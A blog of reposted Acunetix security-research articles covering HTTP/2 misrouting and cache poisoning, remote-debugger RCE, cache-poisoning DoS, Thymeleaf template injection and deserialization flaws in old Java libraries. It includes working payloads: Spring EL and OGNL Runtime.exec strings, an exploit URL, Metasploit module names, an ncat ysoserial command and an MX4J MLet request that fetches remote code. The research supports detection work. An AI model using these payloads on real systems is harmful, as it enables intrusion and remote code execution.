Thursday, December 9, 2021

How Acunetix addresses HTTP/2 vulnerabilities

  (It's a repost from https://www.acunetix.com/blog/web-security-zone/how-acunetix-addresses-http-2-vulnerabilities/)  

In the latest release of Acunetix, we added support for the HTTP/2 protocol and introduced several checks specific to the vulnerabilities associated with this protocol. For example, we introduced checks for misrouting, server-side request forgery (SSRF), and web cache poisoning. In this article, we’d like to explain how these vulnerabilities happen so that you can understand the logic behind the checks.

An introduction to HTTP/2

To understand HTTP/2, it’s best to compare it with its predecessor, HTTP/1.x.

How HTTP/1.x works

HTTP/1.x is a text-based protocol. An HTTP request consists of headers and possibly a body. Headers are separated from one another, and from the body, by the character sequence \r\n (CRLF).

The first header is the request line, which consists of a method, a path, and a protocol version, separated by spaces. All other headers are name and value pairs separated by a colon (:). The only required header is Host.

The path may be represented in different ways. Usually, it is relative and begins with a slash, such as /path/here, but it may also be an absolute URI, such as http://virtualhost2.com/path/here. Moreover, the hostname from an absolute-URI path takes precedence over the value of the Host header.

GET /path/here HTTP/1.1
Host: virtualhost.com
Other-header: value

When a web server receives an HTTP/1.x request, it parses it using certain characters as separators. However, because HTTP is an old protocol with many different RFCs dedicated to it, different web servers parse requests differently and apply different restrictions to the values of certain elements.

How HTTP/2 works

HTTP/2, on the other hand, is a binary protocol with a completely different internal organization. To understand its vulnerabilities, you must know how the main elements of the HTTP/1.x protocol are now represented.

HTTP/2 got rid of the request line; all the data is now presented in the form of headers. Moreover, since the protocol is binary, each header is a field consisting of a length and data, so there is no longer any need to parse data based on special characters.

HTTP/2 has four required headers called pseudo-headers: :method, :path, :scheme, and :authority. Note that pseudo-header names start with a colon, but these names are not transmitted as text – instead, HTTP/2 uses a special identifier for each.

  • :method and :path are straight analogs of the method and path in HTTP/1.1.
  • :scheme is a new header that indicates which protocol is used, usually http or https.
  • :authority is a replacement for the Host header. You are allowed to send the usual Host header in the request but :authority has a higher priority.
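To make the mapping concrete, here is a minimal Python sketch (an illustration, not a real HTTP/2 implementation; the function name is ours) of how a reverse proxy might translate these pseudo-headers into an HTTP/1.1 request:

```python
# Illustrative sketch: how an HTTP/2 front end might map pseudo-headers
# onto an HTTP/1.1 backend request.
def h2_to_h11(pseudo, headers):
    """Build an HTTP/1.1 request from HTTP/2 pseudo-headers.

    `pseudo` holds :method, :path, :scheme, :authority;
    `headers` holds the remaining name/value pairs.
    """
    request_line = f"{pseudo[':method']} {pseudo[':path']} HTTP/1.1"
    # :authority replaces (and takes priority over) the Host header
    lines = [request_line, f"Host: {pseudo[':authority']}"]
    lines += [f"{name}: {value}" for name, value in headers.items()
              if name.lower() != "host"]
    return "\r\n".join(lines) + "\r\n\r\n"

pseudo = {":method": "GET", ":path": "/path/here",
          ":scheme": "https", ":authority": "virtualhost.com"}
print(h2_to_h11(pseudo, {"Other-header": "value"}))
```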

Misrouting and SSRF

Today’s web applications are often multi-layered. They frequently use HTTP/2 to interact with user browsers and HTTP/1.1 to access backend servers via an HTTP/2 reverse proxy. As a result, the reverse proxy must convert the values received from HTTP/2 to HTTP/1.1, which extends the attack surface. In addition, when implementing HTTP/2 support in a web server, developers may be less strict about the values in various headers.

Envoy Proxy

For example, when I was doing research for the talk “Weird proxies/2 and a bit of magic” at ZeroNights 2021, I found that the Envoy Proxy (tested on version 1.18.3) allows you to use arbitrary values in :method, including a variety of special characters, whitespace, and tab characters. This makes misrouting attacks possible.

Let’s say that you specify :method to be GET http://virtualhost2.com/any/path? and :path to be /. Envoy sees a valid path / and routes to the backend. However, when Envoy creates a backend request in the HTTP/1.x protocol format, it simply puts the value from :method into the request line. Thus, the request will be:

GET http://virtualhost2.com/any/path? / HTTP/1.1
Host: virtualhost.com

Depending on the type of backend web server, it can accept or reject such a request (because of the extra space). In the case of nginx, for example, this will be a valid request with the path /any/path? /. Moreover, we can reach an arbitrary virtual host (in the example, virtualhost2.com), to which we otherwise would not have access.
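The Envoy behavior described above can be modeled with a few lines of Python – a toy model under the assumption that :path is validated but :method is copied into the backend request line verbatim:

```python
# Toy model of the Envoy behavior described above (assumption: Envoy
# validates :path but copies :method into the request line verbatim).
def envoy_request_line(method, path):
    # no validation of `method` beyond what HTTP/2 framing requires
    return f"{method} {path} HTTP/1.1"

# A benign request:
assert envoy_request_line("GET", "/") == "GET / HTTP/1.1"

# The misrouting payload: the attacker-chosen URL rides inside :method.
line = envoy_request_line("GET http://virtualhost2.com/any/path?", "/")
print(line)  # GET http://virtualhost2.com/any/path? / HTTP/1.1
```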

On the other hand, the Gunicorn web server allows arbitrary values in the protocol version in the request line. Therefore, to achieve the same result as with nginx, we set :method to GET http://virtualhost2.com/any/path HTTP/1.1. After Envoy processes the request, the request line will look like this:

GET http://virtualhost2.com/any/path HTTP/1.1 / HTTP/1.1

Haproxy

A similar problem exists in Haproxy (tested on version 2.4.0). This reverse proxy allows arbitrary values in the :scheme header. If the value is not http or https, Haproxy puts this value in the request line of the request sent to the backend server. If you set :scheme to test, the request to the web server will look like this:

GET test://virtualhost.com/ HTTP/1.1
Host: virtualhost.com

We can achieve a similar result as for Envoy by simply setting :scheme to http://virtualhost2.com/any/path?. The final request line to the backend will be:

GET http://virtualhost2.com/any/path?://virtualhost.com HTTP/1.1
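Again as a toy model (assuming, as described above, that Haproxy copies a non-http(s) :scheme value into an absolute-form request line):

```python
# Toy model of the Haproxy behavior described above (assumption: a
# non-http(s) :scheme value is copied into the request line as-is).
def haproxy_request_line(method, scheme, authority, path):
    if scheme in ("http", "https"):
        return f"{method} {path} HTTP/1.1"                    # normal origin form
    return f"{method} {scheme}://{authority}{path} HTTP/1.1"  # absolute form

line = haproxy_request_line(
    "GET", "http://virtualhost2.com/any/path?", "virtualhost.com", "/")
print(line)
```

The `?` in the injected :scheme turns the rest of the constructed URL into a query string, so the backend effectively routes to virtualhost2.com.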

This trick can be used both to access arbitrary virtual hosts on the backend (host misrouting) and to bypass various access restrictions on the reverse proxy, as well as to carry out SSRF attacks on the backend server. If the backend has an insecure configuration, it may send a request to an arbitrary host specified in the path from the request line.

The latest release of Acunetix has checks that discover such SSRF vulnerabilities.

Cache poisoning

Another common vulnerability of tools that use the HTTP/2 protocol is cache poisoning. In a typical scenario, a caching server is located in front of a web server and caches responses from the web server. To know which responses are cached, the caching server uses a key. A typical key is method + host + path + query.

As you can see, there are no headers in the key. Therefore, if a web application returns a header value in a response, especially in an unsafe way, an attacker can send a request with an XSS payload in this header. The web application will then return it in the response, the cache server will cache the response, and it will be returned to all other users who request the same path (key).
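A minimal sketch of this scenario (all names here are hypothetical; the "backend" reflects a request header unescaped, and the cache key ignores headers):

```python
# Sketch of the caching logic described above: headers are not part of
# the cache key, so a reflected header value poisons the cached response.
cache = {}

def cache_key(method, host, path, query):
    return (method, host, path, query)

def handle(method, host, path, query, headers, backend):
    key = cache_key(method, host, path, query)
    if key not in cache:
        cache[key] = backend(headers)   # headers influence the response...
    return cache[key]                   # ...but not the key

# Hypothetical vulnerable backend reflecting a request header unescaped:
backend = lambda h: f"<p>Served for {h.get('X-Host', '')}</p>"

# The attacker poisons the entry; a victim's header-free request gets the payload.
attacker = handle("GET", "a.com", "/", "", {"X-Host": "<script>evil()</script>"}, backend)
victim = handle("GET", "a.com", "/", "", {}, backend)
print(victim)
```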

HTTP/2 adds new flavors to this attack. They are associated with the :scheme header, which may not be included in the key of a cache server, but through which we can influence the request from the cache server to a backend server as in the misrouting examples.

The attack may also take advantage of the :authority and Host headers. Both are used to indicate the hostname, but the cache server may handle them incorrectly and, for example, use the Host header in the cache key while forwarding the request to the backend with the value of the :authority header. In such a case, :authority is an unkeyed header and an attacker can put a cache poisoning payload in it.

Cache poisoning DoS

There is also a variation of the cache poisoning attack called the cache poisoning DoS. This happens when a cache server is configured to cache error-related responses (with a response status 400, for example). An attacker can send a specifically crafted request which is valid for the cache proxy but invalid for the backend server. It’s possible because servers parse requests differently and have different restrictions.

HTTP/2 offers us a fairly universal method for this attack. In HTTP/2, to improve performance, each cookie is supposed to be sent in a separate cookie header. In HTTP/1.1, you can only have one Cookie header in the request. Therefore, the cache server, having received a request with several cookie headers, has to concatenate them into one using ; as a separator.

Most servers have a limit on the length of a single header. A typical value is 8192 bytes. Therefore, if an attacker sends an HTTP/2 request with two cookie headers of 5000 bytes each, neither exceeds the limit, and the cache server processes the request. But the cache server concatenates them into one Cookie header, so the length of the Cookie header for the backend is about 10,000 bytes, which is above the limit. As a result, the backend returns a 400 error. The cache server caches it, and we have a cache poisoning DoS.
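The arithmetic can be sketched as follows (the 8192-byte limit and the 5000-byte cookies follow the example above):

```python
# Sketch of the cookie-concatenation CPDoS: each value is under the
# per-header limit on its own, but the joined Cookie header exceeds
# the backend's limit.
MAX_HEADER = 8192  # typical per-header length limit (assumption)

def h2_cookies_to_h11(cookies):
    # HTTP/1.1 allows a single Cookie header, so the proxy joins them
    return "Cookie: " + "; ".join(cookies)

cookies = ["a=" + "x" * 4998, "b=" + "y" * 4998]   # 5000 bytes each
assert all(len(c) <= MAX_HEADER for c in cookies)  # accepted by the proxy

joined = h2_cookies_to_h11(cookies)
print(len(joined))   # well above 8192, so the backend answers 400
```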

The latest release of Acunetix includes checks for both web cache poisoning and CPDoS via HTTP/2.

More HTTP/2 in the future

The vulnerabilities listed above are the most common HTTP/2 vulnerabilities but there are more. We plan to add more checks in future scanner releases.

If this topic is of interest to you, I recommend looking at the following papers:

Friday, April 23, 2021

Remote debuggers as an attack vector

 (It's a repost from https://www.acunetix.com/blog/web-security-zone/remote-debuggers-as-an-attack-vector/)  

Over the course of the past year, our team added many new checks to the Acunetix scanner. Several of these checks were related to the debug modes of web applications as well as components/panels used for debugging. These debug modes and components/panels often have misconfigurations, which may lead to the disclosure of sensitive information or even to remote command execution (code injection).

As I was working on these checks, I remembered cases when I discovered that applications expose a special port for remote debugging. When I was working as a penetration tester, I often found that enterprise Java applications exposed a Java Debug Wire Protocol (JDWP) port, which would easily allow an attacker to get full control over the application.

When I was writing the new Acunetix checks, I became curious about similar cases regarding other programming languages. I also checked what capabilities Nmap has in this respect and found only checks for JDWP. Therefore, I decided to research this blind spot further.

Low-hanging fruit

Every developer uses some kind of debugging tool, but remote debugging is less common. You use remote debugging when you cannot investigate an issue locally – for example, when you need to debug an enterprise Java application that is too big to run locally and is tightly coupled to its environment or data. Another typical scenario for remote debugging is debugging a Docker container.

A debugger is a very valuable target for an attacker. The purpose of a debugger is to give the programmer maximum capabilities. It means that, in almost all cases, the attacker can very easily achieve remote code execution once they access the remote debugger.

Moreover, remote debugging usually happens in a trusted environment. Therefore, many debuggers don’t provide security features and use plain-text protocols without authentication or any kind of restrictions. On the other hand, some debuggers make the attack harder – they provide authentication or client IP restrictions. Some go even further and don’t open a port at all but instead initiate the connection to the IDE. There are also cases when the programmer tunnels the remote debugger connection through SSH.

Below you can find examples of RCE attacks on various debuggers. I tried to cover all common languages but focused on the most popular debuggers only and those that are most commonly misconfigured.

Attacks on debuggers

Java(JVM)/JPDA

JPDA is an architecture for debugging Java applications. It uses JDWP, which means that you can easily detect its port using Nmap. The port is, however, not always the same – it typically depends on the application server. For example, Tomcat uses 8000, while ColdFusion uses 5005.

To gain access to a shell through a successful RCE attack, I used an exploit from Metasploit: exploit/multi/misc/java_jdwp_debugger.

Also note that all other JVM-based languages (Scala, Kotlin, etc.) also use JPDA, so this presents an attacker with a wide range of potential targets.

PHP/XDebug

XDebug is different from all other debuggers described in this article. It does not start its own server like all other debuggers. Instead, it connects back to the IDE. The IP and port of the IDE are stored in a configuration file.

Due to the nature of XDebug, you cannot detect it and attack it using a port scan. However, with a certain configuration of XDebug, you can attack it by sending a special parameter to the web application, which makes it connect to the attacker's host instead of the legitimate IDE.

Acunetix includes a check for such a vulnerable configuration. Details of this attack are available on this blog.

Python/pdb/remote_pdb

pdb is a common Python debugger and the remote_pdb package (and other similar packages) enables remote access to pdb. The default port is 4444. After you connect using ncat, you have full access to pdb and can execute arbitrary Python code.

Python/debugpy/ptvsd

debugpy is a common debugger for Python, provided by Microsoft. There is also a deprecated version of this debugger called ptvsd.

debugpy uses a debug protocol developed by Microsoft – DAP (Debug Adapter Protocol). This is a universal protocol that may also be used for debuggers for other languages. The protocol is similar to JSON messages with a preceding Content-Length header. The default port is 5678.
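Assuming the framing described above (a Content-Length header followed by a JSON body), a DAP message can be encoded like this; the exact request fields are illustrative:

```python
import json

# Sketch of DAP framing: a JSON message preceded by a Content-Length
# header, as described above. The request shape is illustrative.
def dap_encode(message: dict) -> bytes:
    body = json.dumps(message).encode()
    return b"Content-Length: %d\r\n\r\n" % len(body) + body

msg = dap_encode({"seq": 1, "type": "request", "command": "initialize"})
print(msg[:40])
```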

Microsoft uses this protocol in VSCode, so the easiest way to communicate using it is VSCode itself. If you have VSCode with the default Python extension installed, all you need to do is open an arbitrary folder in VSCode, click the Run and Debug tab, click Create a launch.json file, choose Python: Remote Attach, and enter a target IP and port. VSCode will generate a launch.json file in the .vscode/ directory. Then click Run > Start Debugging; once you connect, you can enter any Python code in the Debug console below, and it will be executed on your target.

Ruby/ruby-debug-ide

The ruby-debug-ide (rdebug-ide) gem uses a custom but simple text protocol. This debugger typically uses port 1234.

To execute arbitrary code, you can use VSCode and follow the same steps as for Python. Note that if you want to disconnect from a remote debugger, VSCode sends quit instead of detach (as RubyMine would do), so VSCode stops the debugger completely.

Node.js/Debugger

Versions of Node.js earlier than v7 use the Node.js Debugger. This debugger uses the V8 Debugger protocol (which looks like HTTP headers with a JSON body). The default port is 5858.

The Node.js Debugger allows you to execute arbitrary JS code. All you need to do is use Metasploit with the exploit/multi/misc/nodejs_v8_debugger/ module.

Node.js/Inspector

Newer versions of Node.js use the Node.js Inspector. From the attacker’s point of view, the main difference is that the WebSocket transport protocol is now used and the default port is now 9229.

You can use several methods to interact with this debugger. Below you can see how to do it directly from Chrome, using chrome://inspect.

Golang/Delve

Delve is a debugger for Go. For remote debugging, Delve uses the JSON-RPC protocol, typically on port 2345. The protocol is quite complex, so you really need a client – at the very least, Delve itself (dlv connect server:port).

Go is a compiled language, and I was unable to find a direct way to achieve RCE as with the other languages. Therefore, I recommend that you use a proper IDE (for example, GoLand), because you will have to do some debugging yourself to achieve RCE. Note that the source code is not necessary, but it comes in handy.

Below is an example of connecting to Delve using GoLand.

Delve provides a way to invoke functions imported into an application. However, this feature is still in beta and does not allow passing static strings as function arguments.

The good news is that we can change the values of local variables and pass them to a function. Therefore, we need to pause the application in a non-runtime thread within a scope that interests us. We can use standard libraries for that.

Below you can see how to pause an application in a standard HTTP library and invoke the os.Environ() function, which returns the environment variables of the application (possibly containing sensitive data). If you want to execute arbitrary OS commands, you need to execute exec.Command(cmd, args).Run(). In that case, however, you need to find and stop at a position with variables of type string and []string.

gdbserver

gdbserver allows you to debug applications remotely with gdb. It has no security features. For communication, it uses a special plain-text protocol – the GDB Remote Serial Protocol (RSP).

The most convenient way to interact with this debugger is by using gdb itself: target extended-remote target.ip:port. Note that gdb provides very convenient commands remote get and remote put (for example, remote get remote_path local_path), which allow you to download/upload arbitrary files.

 

Monday, January 4, 2021

Cache poisoning denial-of-service attack techniques

 (It's a repost from https://www.acunetix.com/blog/web-security-zone/cache-poisoning-dos-attack-techniques/)  

Attacks related to cache poisoning represent a clearly visible web security trend that has emerged in recent years. The security community continues to research this area, finding new ways to attack.

As part of the recent release of Acunetix, we have added new checks related to cache poisoning vulnerabilities and we continue to work in this area to improve coverage. In this article, I’d like to share with you a few techniques related to one of the new checks – Cache Poisoning DoS (CPDoS).

What Is a Cache Poisoning Denial-of-Service Attack

In 2019, Hoai Viet Nguyen and Luigi Lo Iacono published a whitepaper related to CPDoS attacks. They explained various attack techniques and analyzed several content delivery networks and web servers that could be affected by such attacks.

CPDoS attacks are possible if there is an intermediate cache proxy server, located between the client (the user) and the web server (the back end), which is configured to cache responses with error-related status codes (e.g. 400 Bad Request). The attacker can manipulate HTTP requests and force the web server to reply with such an error status code for an existing resource (path). Then, the proxy server caches the error response, and all other users that request the same resource get the error response from the cache proxy instead of a valid response.

The whitepaper presents three attack types that allow the attacker to force a web application to return a 400 status code:

  • HTTP Header Oversize (HHO) – when the size of a header exceeds the maximum header length
  • HTTP Meta Character (HMC) – when the header of the attacker’s request contains a special “illegal” symbol
  • HTTP Method Override (HMO) – when the header of the attacker’s request changes the verb (method) to an unsupported one

New HHO Attack Tricks

While analyzing these attacks and working on my project dedicated to reverse proxies, I’ve managed to come up with a couple of tricks that can be used to perform an HHO attack.

Basically, an HHO attack is possible when the maximum header length is defined differently in the cache proxy and the web server. Different web servers, cache servers, and load balancers have different default limits. If the cache proxy has a maximum header limit that is higher than the limit defined in the web server, a request with a very long header can go through the cache server to the web server and cause the web server to return a 400 error (which will then be cached by the cache server).

For example, the default maximum header length for CloudFront is 20,480 bytes. On the other hand, the default maximum header length for the Apache web server is 8,192 bytes. Therefore, if an attacker sends a request with a header that is 10,000 bytes long and CloudFront cache proxy passes it to an Apache server, the Apache web server returns a 400 error.

However, an HHO attack is possible even if the cache server has the same header length limit as the web server or one that is a little lower. There are two reasons for this:

  • The web server maximum header length limit is a string length limit. The web servers that I have tested don’t perform any normalization and probably don’t even parse the header before applying the length check.
  • Cache proxies, however, send correct (normalized) headers to the back end.

 

Same-Limit HHO Attack Example

A practical HHO attack could be performed as follows:

  1. The attacker sends a request with a header that is 8192 bytes long (including \r\n) but with no space between the header name and the value. For example:
    header-name:abcdefgh(…)
    (8192 characters in total)
  2. The cache proxy checks the length of the header and finds that it is not more than 8192 characters long. Therefore, it parses the header and disregards the missing space.
  3. Then, the cache proxy prepares the correct version of the header to be sent to the web server:
    header-name: abcdefgh(…)
    (8193 characters in total)
  4. The cache proxy does not check that the final length of the header exceeds 8192 characters and sends the header to the web server.
  5. The web server that receives the header sees that it exceeds the limit by one byte, and therefore it returns the 400 error page.
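The steps above can be sketched as follows (a toy proxy model; the header name and 8192-byte limit follow the example):

```python
# Sketch of the same-limit HHO trick: the proxy checks the raw header
# length, then normalizes it (adding the space after the colon), which
# pushes it one byte over the backend's identical limit.
LIMIT = 8192

def proxy_forward(raw_header):
    assert len(raw_header) <= LIMIT, "proxy rejects oversized header"
    name, value = raw_header.split(":", 1)
    return f"{name}: {value.lstrip()}"   # normalized form sent to the backend

raw = "header-name:" + "a" * (LIMIT - len("header-name:"))
forwarded = proxy_forward(raw)           # passes the proxy's check...
print(len(raw), len(forwarded))          # 8192 8193 -> backend returns 400
```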

Similar-Limit HHO Attack Example

If the cache proxy maximum header length limit is a bit lower than the web server limit, we cannot use the trick described above (1 byte is not enough). However, in such a case, we can misuse another feature.

Many proxy servers add headers to requests that are forwarded to the web server. For example, X-Forwarded-For, which contains the IP address of the user. However, if the original request also contains the X-Forwarded-For header, the proxy server often concatenates the original value with the value set by the proxy server (the user IP).

This allows us to perform the following attack:

  1. The attacker sends a request with the following header:
    X-Forwarded-For: abcdefgh(…)
    (8192 characters in total)
  2. The proxy concatenates this request with its own value:
    X-Forwarded-For: abcdefgh(…)12.34.56.78
    (8203 characters in total)
  3. The proxy sends the value to the web server, which replies with an error code because the header is too long.
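In the same toy style, the header-append variant (the appended IP 12.34.56.78 and direct concatenation follow the example above; real proxies may insert a separator, which only lengthens the result further):

```python
# Sketch of the similar-limit HHO variant: the proxy appends the client
# IP to an attacker-supplied X-Forwarded-For value, overshooting the
# backend's limit.
LIMIT = 8192

def proxy_xff(client_value, client_ip):
    # proxy concatenates its own value onto the client-supplied one
    return f"X-Forwarded-For: {client_value}{client_ip}"

value = "a" * (LIMIT - len("X-Forwarded-For: "))
sent = "X-Forwarded-For: " + value          # 8192 bytes: passes the proxy
forwarded = proxy_xff(value, "12.34.56.78")
print(len(sent), len(forwarded))            # 8192 8203
```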

Depending on the type of proxy and its configuration, the added headers may differ, and the lengths of the added values may differ as well. You can check some of them on my project page.

The Impact of CPDoS Attacks

When we were testing our new CPDoS script on bug bounty sites, we noticed that many sites are vulnerable to such attacks. However, in some cases, the impact of the attack is questionable. This is because quite a few cache proxies are configured to cache responses with error status codes only for a few seconds, which makes it difficult to exploit.

 

 

Thursday, July 23, 2020

Exploiting SSTI in Thymeleaf

 (It's a repost from https://www.acunetix.com/blog/web-security-zone/exploiting-ssti-in-thymeleaf/ )

One of the most convenient ways to build web pages is by using server-side templates. Such templates let you create HTML pages that include special elements that you can fill and modify dynamically. They are easy to understand for designers and easy to maintain for developers. There are many server-side template engines for different server-side languages and environments. One of them is Thymeleaf, which works with Java.

Server-side template injections (SSTI) are vulnerabilities that let the attacker inject code into such server-side templates. In simple terms, the attacker can introduce code that is actually processed by the server-side template. This may result in remote code execution (RCE), which is a very serious vulnerability. In many cases, such RCE happens in a sandbox environment provided by the template engine, but it is often possible to escape this sandbox, which may even let the attacker take full control of the web server.

SSTI was initially researched by James Kettle and later by Emilio Pinna. However, neither of these authors included Thymeleaf in their SSTI research. Let’s see what RCE opportunities exist in this template engine.

Introduction to Thymeleaf

Thymeleaf is a modern server-side template engine for Java, based on XML/XHTML/HTML5 syntax. One of the core advantages of this engine is natural templating. This means that a Thymeleaf HTML template looks and works just like HTML. This is achieved mostly by using additional attributes in HTML tags. Here is an official example:

<table>
  <thead>
    <tr>
      <th th:text="#{msgs.headers.name}">Name</th>
      <th th:text="#{msgs.headers.price}">Price</th>
    </tr>
  </thead>
  <tbody>
    <tr th:each="prod: ${allProducts}">
      <td th:text="${prod.name}">Oranges</td>
      <td th:text="${#numbers.formatDecimal(prod.price, 1, 2)}">0.99</td>
    </tr>
  </tbody>
</table>
 

If you open a page with this code using a browser, you will see a filled table and all Thymeleaf-specific attributes will simply be skipped. However, when Thymeleaf processes this template, it replaces tag text with values passed to the template.

Hacking Thymeleaf

To attempt an SSTI in Thymeleaf, we first must understand expressions that appear in Thymeleaf attributes. Thymeleaf expressions can have the following types:

  • ${...}: Variable expressions – in practice, these are OGNL or Spring EL expressions.
  • *{...}: Selection expressions – similar to variable expressions but used for specific purposes.
  • #{...}: Message (i18n) expressions – used for internationalization.
  • @{...}: Link (URL) expressions – used to set correct URLs/paths in the application.
  • ~{...}: Fragment expressions – they let you reuse parts of templates.

The most important expression type for an attempted SSTI is the first one: variable expressions. If the web application is based on Spring, Thymeleaf uses Spring EL. If not, Thymeleaf uses OGNL.

The typical test expression for SSTI is ${7*7}. This expression works in Thymeleaf, too. If you want to achieve remote code execution, you can use one of the following test expressions:

  • SpringEL: ${T(java.lang.Runtime).getRuntime().exec('calc')}
  • OGNL: ${#rt = @java.lang.Runtime@getRuntime(),#rt.exec("calc")}

However, as we mentioned before, expressions only work in special Thymeleaf attributes. If it’s necessary to use an expression in a different location in the template, Thymeleaf supports expression inlining. To use this feature, you must put an expression within [[...]] or [(...)] (select one or the other depending on whether you need to escape special symbols). Therefore, a simple SSTI detection payload for Thymeleaf would be [[${7*7}]].

Chances that the above detection payload would work are, however, very low. SSTI vulnerabilities usually happen when a template is dynamically generated in the code. Thymeleaf, by default, doesn’t allow such dynamically generated templates; all templates must be created in advance. Therefore, if a developer wants to create a template from a string on the fly, they need to create their own TemplateResolver. This is possible but happens very rarely.

A Dangerous Feature

If we take a deeper look into the documentation of the Thymeleaf template engine, we will find an interesting feature called expression preprocessing. Expressions placed between double underscores (__...__) are preprocessed and the result of the preprocessing is used as part of the expression during regular processing. Here is an official example from Thymeleaf documentation:

#{selection.__${sel.code}__}

Thymeleaf first preprocesses ${sel.code}. Then, it uses the result (in this example, the stored value ALL) as part of a real expression evaluated later (#{selection.ALL}).

This feature introduces a major potential for an SSTI vulnerability. If the attacker can control the content of the preprocessed value, they can execute an arbitrary expression. More precisely, it is a double-evaluation vulnerability, but this is hard to recognize using a black-box approach.
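The double-evaluation pattern can be modeled outside Thymeleaf. The sketch below is plain Python (not OGNL or Spring EL) with a deliberately restricted arithmetic evaluator standing in for the expression language, just to show how a preprocessed value becomes an expression on the second pass:

```python
import re

def evaluate(expr, ctx):
    # stand-in for OGNL/Spring EL: resolve variables, else do arithmetic
    return ctx[expr] if expr in ctx else eval(expr, {"__builtins__": {}}, {})

def render(template, ctx):
    # pass 1: __${...}__ spans are preprocessed
    t = re.sub(r"__\$\{(.*?)\}__",
               lambda m: str(evaluate(m.group(1), ctx)), template)
    # pass 2: the (now attacker-influenced) template is evaluated normally
    return re.sub(r"\$\{(.*?)\}",
                  lambda m: str(evaluate(m.group(1), ctx)), t)

# `path` comes straight from the request URL, as in the PetClinic example:
ctx = {"path": "${7*7}"}
print(render("@{__${path}__}", ctx))   # the injected ${7*7} is evaluated: @{49}
```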

A Real-World Example of SSTI in Thymeleaf

PetClinic is an official demo application based on the Spring framework. It uses Thymeleaf as a template engine.

Most templates in this application reuse parts of the layout.html template, which includes a navigation bar. It has a special fragment (function), which generates the menu.

<li th:fragment="menuItem (path,active,title,glyph,text)" class="active" th:class="${active==menu ? 'active' : ''}">
      <a th:href="@{__${path}__}" th:title="${title}">

As you can see, the application preprocesses ${path}, which is then used to set a correct link (@{}). However, this value comes from other parts of the template:

<li th:replace="::menuItem ('/owners/find','owners','find owners','search','Find owners')">

Unfortunately, all the parameters are static and uncontrollable by the attacker.

However, if we try to access a route that does not exist, the application returns the error.html template, which also reuses this part of layout.html. In the case of an exception (and accessing a route that does not exist is an exception), Spring automatically adds variables to the current context (model attributes). One of these variables is path (others include timestamp, trace, message, and more).

The path variable is the path part (with no URL decoding) of the URL of the current request. More importantly, this path is used inside the menuItem fragment. Therefore, __${path}__ preprocesses the path from the request, and the attacker can control this path to achieve SSTI and, as a result, RCE.

As a simple test, we can send a request to http://petclinic/(7*7) and get 49 as the response.

However, despite this effect, we couldn’t find a way to achieve RCE in this situation when the application runs on Tomcat. This is because you need to use Spring EL, so you need to use ${}. However, Tomcat does not allow { and } characters in the path without URL-encoding. And we cannot use encoding, because ${path} returns the path without decoding. To prove these assumptions, we ran PetClinic on Jetty instead of Tomcat and achieved RCE because Jetty does not limit the use of { and } characters in the path:

http://localhost:8082/(${T(java.lang.Runtime).getRuntime().exec('calc')})

We had to use ( and ) characters because after preprocessing the @{} expression receives a string starting with / (for example, /${7*7}), so the expression is not treated as an expression. The @{} expression allows you to add parameters to the URL by putting them in parentheses. We can misuse this feature to clear the context and get our expression executed.

Conclusion

Server-side template injection is much more of an issue than it appears to be because server-side templates are used more and more often. There are a lot of such template engines, and many of them have not been explored yet but may introduce SSTI vulnerabilities if misused. There is a long way from ${7*7} to achieving RCE but in many cases, as you can see, it is possible.

As security researchers, we always find it interesting to see how complex technologies clash and affect each other and how much still remains unexplored.

 

Thursday, February 27, 2020

The curse of old Java libraries

(It's a repost from https://www.acunetix.com/blog/web-security-zone/old-java-libraries/)

Java is known for its backward-compatibility. You can still execute code that was written many years ago, as long as you use an appropriate version of Java. Thanks to this feature, modern projects use a wide range of libraries that have been “tested by time” in production. However, such libraries are often left unsupported by maintainers for a long time. As a result, when you discover a vulnerability in a library, you may find it very hard to report the issue and to warn the developers who use that library.

Here are a few examples of such problems related to old libraries, which I recently came across when exploiting vulnerabilities as part of various bug bounty programs.

JMX and JMXMP

JMX (Java Management Extensions) is a well-known and widely used technology for monitoring and managing Java applications. Since the Java deserialization “apocalypse”, it has gained a notorious reputation among security specialists. JMX uses the RMI protocol for transport, which makes it inherently vulnerable to Java deserialization attacks. However, Oracle introduced the JEP-290 specification (JDK ≥ 8u121, ≥ 7u131, ≥ 6u141), which made such attacks much harder.

It turns out that according to the JMX specification (JSR-160), JMX also supports other transport protocols (called connectors), including the JMX Messaging Protocol (JMXMP) – a protocol specially created for JMX. However, this protocol was not included in Java SE and so it never became popular. One of the main advantages of JMXMP in comparison to RMI is the fact that JMXMP requires only one TCP port (RMI uses one static port for the RMI registry and another dynamically chosen port for actual interaction with a client). This fact makes JMXMP much more convenient when you need to restrict access using a firewall or when you want to set up port forwarding.

Despite the fact that libraries implementing JMXMP (jmxremote_optional.jar, opendmk_jmxremote_optional_jar-1.0-b01-ea.jar) have not been updated for at least ten years, JMXMP is still alive and used from time to time. For example, JMXMP is used in the Kubernetes environment and support for JMXMP has recently been added to Elassandra.

The problem with JMXMP is that this protocol relies completely on Java serialization for data transfer. At the same time, Oracle patches for JMX/RMI vulnerabilities don’t cover JMXMP, which leaves it open to Java deserialization attacks. To exploit this vulnerability, you don’t even need to understand the protocol or the format of the data: just send a serialized payload from ysoserial directly to a JMXMP port:

ncat target.server.com 11099 < test.jser

If you cannot exploit this Java deserialization vulnerability (due to the lack of gadgets in the application classpath), you can still use other methods, such as uploading your own MBean or misusing existing MBean methods. To connect to such a JMX endpoint, you need to download the necessary package, add it to the classpath, and use the following format to specify the JMX endpoint: service:jmx:jmxmp://target.server.com:port/.

For example:

jconsole -J-Djava.class.path="%JAVA_HOME%/lib/jconsole.jar";"%JAVA_HOME%/lib/opendmk_jmxremote_optional_jar-1.0-b01-ea.jar" service:jmx:jmxmp://target.server.com:port/

You can also use MJET but it requires similar changes to the code.

MX4J

MX4J is an open-source implementation of JMX. It also provides an HTTP adapter that exposes JMX through HTTP (it works as a servlet). The problem with MX4J is that by default it doesn’t provide authentication. To exploit it, we can deploy a custom MBean using MLet (upload and execute the code). To upload the payload, you can use MJET. To force MX4J to get the MBean, you need to send a GET request to:

/invoke?objectname=DefaultDomain:type=MLet&operation=getMBeansFromURL&type0=java.lang.String&value0=http://yourserver/with/mlet

MX4J has not been updated for 15 years, but it is used by software such as Cassandra (in a non-default configuration). Your “homework” now is to look deeper into it and search for vulnerabilities. Note the availability of the Hessian and Burlap protocols as JMX connectors, which are also vulnerable to deserialization attacks in the default configuration.

VJDBC

Virtual JDBC is an old library that provides access to a database via JDBC over other protocols (HTTP, RMI). In the case of HTTP, it provides a servlet to which you can send a special HTTP request that includes an SQL query and receive the result from the DB used by the web application. Unfortunately, VJDBC also uses Java serialization (over HTTP) to interact with the servlet.

